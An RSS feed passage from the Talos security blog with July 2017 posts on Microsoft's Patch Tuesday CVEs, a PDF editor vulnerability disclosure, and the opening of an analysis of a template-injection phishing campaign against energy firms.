<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0"><channel><title>Talos Blog</title><link>http://blog.talosintelligence.com/</link><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/feedburner/Talos" /><description>Talos Group, by Cisco</description><language>en</language><managingEditor>noreply@blogger.com (Nick Biasini)</managingEditor><lastBuildDate>Wed, 12 Jul 2017 06:10:14 PDT</lastBuildDate><generator>Blogger</generator><atom:id xmlns:atom="http://www.w3.org/2005/Atom">tag:blogger.com,1999:blog-1029833275466591797</atom:id><openSearch:totalResults xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">706</openSearch:totalResults><openSearch:startIndex xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">1</openSearch:startIndex><openSearch:itemsPerPage xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/">25</openSearch:itemsPerPage><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/feedburner/Talos" /><feedburner:info uri="feedburner/talos" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><feedburner:emailServiceId>feedburner/Talos</feedburner:emailServiceId><feedburner:feedburnerHostname>https://feedburner.google.com</feedburner:feedburnerHostname><item><title>Microsoft Patch Tuesday  - July 2017</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/21ZcWIIsN98/ms-tuesday.html</link><category>Coverage</category><category>Microsoft</category><category>ms tuesday</category><category>patch tuesday</category><category>Snort Rules</category><category>Talos</category><author>noreply@blogger.com (William Largent)</author><pubDate>Tue, 11 Jul 2017 12:59:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-6346785117187266706</guid><description>Today, Microsoft has release their monthly set of security updates designed to address vulnerabilities. This month's release addresses 54 vulnerabilities with 19 of them rated critical, 32 rated important, and 3 rated moderate. Impacted products include Edge, .NET Framework, &amp;nbsp;Internet Explorer, Office, &amp;nbsp;and Windows.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;h3&gt;Vulnerabilities Rated Critical&lt;/h3&gt;&lt;br /&gt;&lt;h4&gt;&lt;/h4&gt;&lt;h4&gt;CVE-2017-8463&lt;/h4&gt;&lt;div&gt;This is a remote code execution vulnerability related to the way that Windows Explorer handles executable files and shares during rename operations. If exploited this vulnerability could run arbitrary code, users not running as administrators would be less affected. This vulnerability can be triggered via a malicious share folder and malware named with an executable extension.&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;CVE-2017-8584&lt;/h4&gt;A remote code execution vulnerability exists when HoloLens improperly handles objects in memory. An attacker who successfully exploited this vulnerability could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. To exploit this vulnerability, an attacker would need to send a specially crafted WiFi packet.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8589&lt;/h4&gt;This is a remote code execution vulnerability in Windows Search related to the improper handling of objects in memory. This can be exploited by an attacker sending a specially crafted SMB message to the Windows Search service.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8594&lt;/h4&gt;A remote code execution vulnerability exists when Internet Explorer, this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8595 / CVE-2017-8596 / CVE-2017-8617 &lt;/h4&gt;A remote code execution vulnerability exists in Microsoft Edge, this vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code with current user privilege. If the current user is logged on with administrative user rights, the attacker could take control of an affected system and could then install programs; view, change, or delete data; or create new accounts with full user rights. This can be exploited by a user visiting a specially crafted webpage. In addition, an attacker could embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the browser rendering engine.   &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8598&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8601&lt;/h4&gt;This is a remote code execution vulnerability in the Chakra JavaScript engine in Microsoft browsers related to improper handling of objects in memory. Exploitation can occur through a specially crafted website or an ActiveX control marked "safe for initialization" resulting in the attacker gaining taking full control of the affected system. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8603&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the way the engine handles objects in memory. The resulting corruption of memory can result in arbitrary code execution. This can be exploited by a user visiting a specially crafted webpage. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8604&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8605&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office document. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8606 / CVE-2017-8607 / CVE-2017-8608 / CVE-2017-8609&lt;/h4&gt;This is a remote code execution in the JavaScript engines in Microsoft Browsers related to improper handling of objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user.   &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8610&lt;/h4&gt;This is a remote code execution vulnerability in Microsoft Edge related to the improper handling of objects in memory. The resulting memory corruption could result in arbitrary code execution. This can be exploited by having a user view a specially crafted website or via an ActiveX control marked "safe for initialization" in an application or Microsoft Office.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8618&lt;/h4&gt;This is a remote code execution in the VBScript engine, when rendered in Internet Explorer handles objects in memory. Exploitation can occur through the viewing of a specially crafted website and can result in the attacker gaining the same user rights as the current user. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8619&lt;/h4&gt;These are remote code execution vulnerabilities in Microsoft's Edge browser related to improper access of objects in memory. This resulting memory corruption can result in arbitrary code execution. These can be exploited by a user visiting a specially crafted website. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;&lt;/h4&gt;&lt;h3&gt;Vulnerabilities Rated Moderate&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;CVE-2017-0170&lt;/h4&gt;An information disclosure vulnerability exists in the Windows Performance Monitor Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity(XXE). To exploit the vulnerability, an attacker could create specially crafted XML data and convince an authenticated user to create a Data Collector Set and import the file. To create a Data Collector Set, the user must be a member of the Performance Log Users or Local Administrators group.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8611&lt;/h4&gt;This is a spoofing vulnerability in Microsoft Edge when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities.   &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8621&lt;/h4&gt;An open redirect vulnerability exists in Microsoft Exchange that could lead to spoofing. To exploit the vulnerability, an attacker could send a crafted URL, when an authenticated Exchange user clicks the link, the authenticated user's browser session could be redirected to a malicious site that is designed to impersonate a legitimate website. By doing so, the attacker could trick the user and potentially acquire sensitive information, such as the user's credentials.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Vulnerabilities Rated Important&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;h4&gt;CVE-2017-0243&lt;/h4&gt;A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with privileges of the current user. This can be exploited by having a user open a specially crafted file. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8467&lt;/h4&gt;An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8486&lt;/h4&gt;This is an information disclosure vulnerability in Microsoft Windows when Win32k fails to properly handle objects in memory. This can be triggered by an authenticated attacker executing a specially crafted application. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8495&lt;/h4&gt;A security feature bypass vulnerability exists in Microsoft Windows when Kerberos fails to prevent tampering with the SNAME field during ticket exchange. Successful exploitation of this vulnerability could be used to bypass Extended Protection for Authentication. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8501 / CVE-2017-8502&lt;/h4&gt;These are remote code execution in Microsoft Office related to improper handling of objects in memory. Exploitation occurs when a user opens a specially crafted file. This file could be delivered via an email message or be hosted on a website.  &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8556&lt;/h4&gt;An elevation of privilege vulnerability exists in Windows when the Microsoft Graphics Component fails to properly handle objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8557&lt;/h4&gt;An information disclosure vulnerability exists in the Windows System Information Console when it improperly parses XML input. An attacker who successfully exploited this vulnerability could read arbitrary files via an XML external entity(XXE). To exploit the vulnerability, an attacker could create specially crafted XML data.  &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8559 / CVE-2017-8560&lt;/h4&gt;An elevation of privilege vulnerability exists when Microsoft Exchange Outlook Web Access (OWA) fails to properly handle web requests. Exploitation occurs by an authenticated attacker sending a specially crafted request.    &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8561&lt;/h4&gt;This is a privilege escalation vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a specially crafted application to elevate privilege. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8562&lt;/h4&gt;There is a privilege escalation vulnerability in Windows when it improperly handles calls to Advanced Local Procedure Call (ALPC). This is exploitable by local attacker executing a specially crafted application to elevate privilege.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8563&lt;/h4&gt;An elevation of privilege vulnerability exists in Microsoft Windows when Kerberos falls back to NT LAN Manager (NTLM) Authentication Protocol as the default authentication protocol. This is exploitable by local attacker executing a specially crafted application to send malicious traffic to a domain controller. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8564&lt;/h4&gt;This is an information disclosure vulnerability in the Windows Kernel related to the improper handling of objects in memory. This is exploitable by local attacker executing a  crafted application, allowing the attacker to retrieve information that could lead to a Kernel Address Space Layout Randomization (KASLR) bypass. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8565&lt;/h4&gt;This is a remote code execution vulnerability within PowerShell when PSObject wraps a CIM Instance. An attacker who successfully exploited this vulnerability could execute malicious code on a vulnerable system. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8566&lt;/h4&gt;This is an elevation of privilege vulnerability in Windows Input Method Editor (IME) when IME improperly handles parameters in a method of a DCOM class. The DCOM server is a Windows component installed regardless of which languages/IMEs are enabled and an attacker can instantiate the DCOM class and exploit the system even if IME is not enabled. This is exploitable by local attacker executing a specially crafted application to elevate privilege. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8569&lt;/h4&gt;An elevation of privilege vulnerability exists in Microsoft SharePoint Server, when it does not properly sanitize a specially crafted web request. An authenticated attacker could exploit the vulnerability, via a specially crafted request, to an affected SharePoint server. If successfully the attacker could then perform cross-site scripting attacks on affected systems and run scripts in the privilege of the current user. This can allow the attacker to read content they are not authorized to read, use the victim's identity to take actions on the SharePoint site on behalf of the user, such as change permissions and delete content, and inject malicious content in the browser of the user.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8570&lt;/h4&gt;A remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could perform actions with privileges of the current user. This can be exploited by having a user open a specially crafted file.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8573 / CVE-2017-8574 / CVE-2017-8577 / CVE-2017-8578 / CVE-2017-8580&lt;/h4&gt;An elevation of privilege vulnerability exists in Microsoft Graphics Component. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8581&lt;/h4&gt;An elevation of privilege vulnerability exists when Windows improperly handles objects in memory. An authenticated attacker who successfully exploited this vulnerability could run processes in an elevated context.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8582&lt;/h4&gt;An Information Disclosure vulnerability exists when the HTTP.sys server application component improperly handles objects in memory. A remote unauthenticated attacker could exploit this vulnerability by issuing a request to the server application.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8585&lt;/h4&gt;This is a denial of service vulnerability when Microsoft Common Object Runtime Library improperly handles web requests. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET application. This attack could cause a denial of service on the target system, requiring a reboot to resolve. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8587&lt;/h4&gt;A Denial Of Service vulnerability exists when Windows Explorer attempts to open a non-existent file. An attacker could exploit this vulnerability by hosting a specially crafted web site and convince a user to browse to the page, containing the reference to the non-existing file, and cause the victim's system to stop responding.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8588&lt;/h4&gt;A remote code execution vulnerability exists in the way that Microsoft WordPad parses specially crafted files. Exploitation of this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft WordPad. An attacker could exploit the vulnerability by sending a specially crafted file to the user via email.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8590&lt;/h4&gt;An elevation of privilege vulnerability exists in Windows Common Log File System (CLFS). A locally authenticated attacker could exploit this vulnerability by running a specially crafted application to take control of the affected system. An attacker who successfully exploited this vulnerability could run processes in an elevated context.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8592&lt;/h4&gt;A security feature bypass vulnerability exists when Microsoft Browsers improperly handle redirect requests. This vulnerability allows Microsoft Browsers to bypass CORS redirect restrictions and follow redirect requests that should otherwise be ignored. An attacker who successfully exploited this vulnerability could force the browser to send data that would otherwise be restricted to a destination web site of their choice.&lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8599&lt;/h4&gt;A security feature bypass vulnerability exists when Microsoft Edge fails to correctly apply Same Origin Policy for HTML elements present in other browser windows. This can be exploited by a user visiting a specially crafted webpage. &lt;br /&gt;&lt;br /&gt;&lt;h4&gt;CVE-2017-8602&lt;/h4&gt;This is a spoofing vulnerability in Microsoft Browser when it does not properly parse HTTP content. An attacker could use a crafted website to either spoof content or serve as a pivot to chain an attack with other vulnerabilities.  &lt;br /&gt;&lt;br /&gt;&lt;h3&gt;Coverage&lt;/h3&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;In response to these bulletin disclosures, Talos is releasing the following rules to address these vulnerabilities. Please note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules:&lt;br /&gt;42753&lt;br /&gt;42755-42756&lt;br /&gt;43460-43463&lt;br /&gt;43465-43466&lt;br /&gt;43469-43474&lt;br /&gt;43490-43493&lt;br /&gt;43521-43522&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=21ZcWIIsN98:w-MkB9T8JeY:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/21ZcWIIsN98" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-11T15:59:29.721-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/ms-tuesday.html</feedburner:origLink></item><item><title>Vulnerability Spotlight: Iceni Infix PDF Editor Memory Corruption</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/H49ZIv0xXd4/iceni-infix-pdf.html</link><category>0-day</category><category>iceni</category><category>Vulnerability Research</category><category>vulnerability spotlight</category><author>noreply@blogger.com (Nick Biasini)</author><pubDate>Tue, 11 Jul 2017 07:29:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-8012137625585732939</guid><description>Today, Talos is disclosing a vulnerability that has been identified in Iceni Infix PDF Editor that could lead to arbitrary code execution on affected hosts. This vulnerability manifests in a way that could be exploited if a user opens a specifically crafted PDF file that triggers this flaw. Talos has coordinated with Iceni to ensure relevant details regarding the vulnerability have been shared. Iceni has developed a software update that addresses this vulnerability. In addition, Talos has developed Snort Rules that can detect attempts to exploit this flaw.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.olijqix0wqh7"&gt;Vulnerability Details&lt;/h2&gt;TALOS-2017-0367 was identified by Piotr Bania of Talos.&lt;br /&gt;&lt;br /&gt;TALOS-2017-0367 (CVE-2017-2863) is memory corruption vulnerability in Iceni Infix that could be leveraged to achieve arbitrary code execution on the affected device. TALOS-2017-0367 manifests as a out of bound write flaw in the PDF parsing functionality. Exploitation is possible if a user were to open a specifically crafted PDF file that targets this vulnerability. The most likely form of attack this could be exploited would be in a social engineering scenario where a user receives an email containing a malicious PDF that exploits this vulnerability.&lt;br /&gt;&lt;br /&gt;For more technical details, please read our advisory &lt;a href="https://www.talosintelligence.com/reports/TALOS-2017-0367"&gt;here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;h2 id="h.buhka1mosi6o"&gt;Coverage&lt;/h2&gt;Talos has developed the following Snort rules to detect attempts to exploit this vulnerability. Note that these rules are subject to change pending additional vulnerability information. For the most current information, please visit your Firepower Management Center or Snort.org.&lt;br /&gt;&lt;br /&gt;Snort Rules: 43212-43213&lt;br /&gt;&lt;br /&gt;For other vulnerabilities Talos has disclosed, please refer to our Vulnerability Report Portal: &lt;a href="http://www.talosintelligence.com/vulnerability-reports/"&gt;http://www.talosintelligence.com/vulnerability-reports/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;To review our Vulnerability Disclosure Policy, please visit this site:&lt;br /&gt;&lt;a href="http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html"&gt;http://www.cisco.com/c/en/us/about/security-center/vendor-vulnerability-policy.html&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/feedburner/Talos?a=H49ZIv0xXd4:IJy3GwBwCX0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/feedburner/Talos?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/H49ZIv0xXd4" height="1" width="1" alt=""/&gt;</description><atom:updated xmlns:atom="http://www.w3.org/2005/Atom">2017-07-11T10:30:33.452-04:00</atom:updated><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://blog.talosintelligence.com/2017/07/iceni-infix-pdf.html</feedburner:origLink></item><item><title>Attack on Critical Infrastructure Leverages Template Injection</title><link>http://feedproxy.google.com/~r/feedburner/Talos/~3/sNpalbGj2jI/template-injection.html</link><category>SMB Malware Energy</category><author>noreply@blogger.com (Earl Carter)</author><pubDate>Fri, 07 Jul 2017 13:34:00 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1029833275466591797.post-2692794276796878969</guid><description>&lt;br /&gt;Contributors: &amp;nbsp;&lt;a href="https://www.linkedin.com/in/seanrichardbaird/"&gt;Sean Baird&lt;/a&gt;, &lt;a href="https://www.blogger.com/profile/07833323932899203321"&gt;Earl Carter&lt;/a&gt;, &lt;a href="http://twitter.com/krabsonsecurity"&gt;Erick Galinkin&lt;/a&gt;, &lt;a href="https://www.linkedin.com/in/christophermarczewski/"&gt;Christopher Marczewski &lt;/a&gt;&amp;amp; &lt;a href="https://twitter.com/ImmortanJo3"&gt;Joe Marshall&amp;nbsp;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2&gt;Executive Summary&lt;/h2&gt;&lt;br /&gt;Attackers are continually trying to find new ways to target users with malware sent via email. Talos has identified an email-based attack targeting the energy sector, including nuclear power, that puts a new spin on the classic word document attachment phish. Typically, malicious Word documents that are sent as attachments to phishing emails will themselves contain a script or macro that executes malicious code.  In this case, there is no malicious code in the attachment itself. The attachment instead tries to download a template file over an SMB connection so that the user's credentials can be silently harvested. In addition, this template file could also potentially be used to download other malicious payloads to the victim's computer.&lt;br /&gt;&lt;br /&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-M7_TVig0AcU/WV_2Dubji2I/AAAAAAAAAOU/PjPQDCPcQ48pZhZcBc84OYwn02UQTEcNgCEwYBhgL/s1600/talos-social.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" data-original-height="627" data-original-width="1200" height="208" src="https://3.bp.blogspot.com/-M7_TVig0AcU/WV_2Dubji2I/AAAAAAAAAOU/PjPQDCPcQ48pZhZcBc84OYwn02UQTEcNgCEwYBhgL/s400/talos-social.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;h2&gt;Background&lt;/h2&gt;&lt;br /&gt;Since at least May 2017, Talos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States.  These attacks target both the critical infrastructure providers, and the vendors those providers use to deliver critical services. Attacks on critical infrastructure are not a new concern for security researchers, as adversaries are keen to understand critical infrastructure ICS networks for reasons unknown, but surely nefarious.&lt;br /&gt;&lt;br /&gt;One objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries. Using a new twist on an old attack method, a clever adversary stole credentials from their victims by sending malicious word documents via email. These documents when opened, attempt to retrieve a template file from an attacker controlled external SMB server.&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Technical Investigation&lt;/h2&gt;&lt;br /&gt;In the midst of recent attack trends and global campaigns, it has become easier to pass over simple techniques that serve attackers' best interests for years. As Talos has recently observed, sometimes new takes on reliable techniques can make them even more effective.&lt;br /&gt;&lt;br /&gt;While investigating a recently reported attack and pivoting on the data provided, we landed on several interesting DOCX samples which were delivered as attachments in malicious spam emails.  As shown below, these documents often claimed to be environmental reports or resumés/CVs.&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://4.bp.blogspot.com/-hbtJ8O9-dVI/WV_mogDXuDI/AAAAAAAAANk/V8qFZAC7WIQn3GCx-7IdBsJRBpWf9gNGgCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="627" data-original-width="1600" height="249" src="https://4.bp.blogspot.com/-hbtJ8O9-dVI/WV_mogDXuDI/AAAAAAAAANk/V8qFZAC7WIQn3GCx-7IdBsJRBpWf9gNGgCLcBGAs/s640/image5.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Sample email containing a malicious document&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://3.bp.blogspot.com/-4bq7xG7VppY/WV_nK4PkZkI/AAAAAAAAANo/gF40I3Ayk1YnPsOHME2H92DwbwVrVUdbQCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1130" data-original-width="1600" height="450" src="https://3.bp.blogspot.com/-4bq7xG7VppY/WV_nK4PkZkI/AAAAAAAAANo/gF40I3Ayk1YnPsOHME2H92DwbwVrVUdbQCLcBGAs/s640/image6.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;One DOCX sample used during this attack&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-5gBa-QSqir4/WV_nYAkzf7I/AAAAAAAAANs/-XMKtTtA4gQKVgcLcxQMCjmGa3BFihM8gCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="1128" data-original-width="1600" height="450" src="https://2.bp.blogspot.com/-5gBa-QSqir4/WV_nYAkzf7I/AAAAAAAAANs/-XMKtTtA4gQKVgcLcxQMCjmGa3BFihM8gCLcBGAs/s640/image4.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Another DOCX sample used during this attack&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Our first expectation was that we would find some malicious VBA macros or embedded scripting within the sample itself. Examination of the VBA code provided no such leads:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://1.bp.blogspot.com/-uItWiRZ0zyg/WV_nfOHzyvI/AAAAAAAAANw/TsH-ePQbgyoeer5Y1WGfQNZvv5sMMOspwCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="127" data-original-width="637" height="126" src="https://1.bp.blogspot.com/-uItWiRZ0zyg/WV_nfOHzyvI/AAAAAAAAANw/TsH-ePQbgyoeer5Y1WGfQNZvv5sMMOspwCLcBGAs/s640/image9.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Analysis of the document using oletools&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;We confirmed this by running the sample against another similar tool:&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="https://2.bp.blogspot.com/-y823HJm7b10/WV_nkxfveyI/AAAAAAAAAN0/FompxNcn5VshkEqYIqPE3DTb0E2z_2XLwCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" data-original-height="461" data-original-width="773" height="380" src="https://2.bp.blogspot.com/-y823HJm7b10/WV_nkxfveyI/AAAAAAAAAN0/FompxNcn5VshkEqYIqPE3DTb0E2z_2XLwCLcBGAs/s640/image10.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;Further analysis of the DOCX&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;Again, none of the usual indicators of an embedded binary that would contain such code appeared in our analysis. The sample had been acquired from our sandbox by researching an IP address related to the attack, but the server was no longer accepting such requests at the time of the sandbox run. While we investigated other leads, we set up an isolated environment with a server listening on TCP 80 to determine what the document was trying to obtain, if anything.&lt;br /&gt;&lt;br /&gt;At the loading screen for Word, we noticed something interesting:&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" 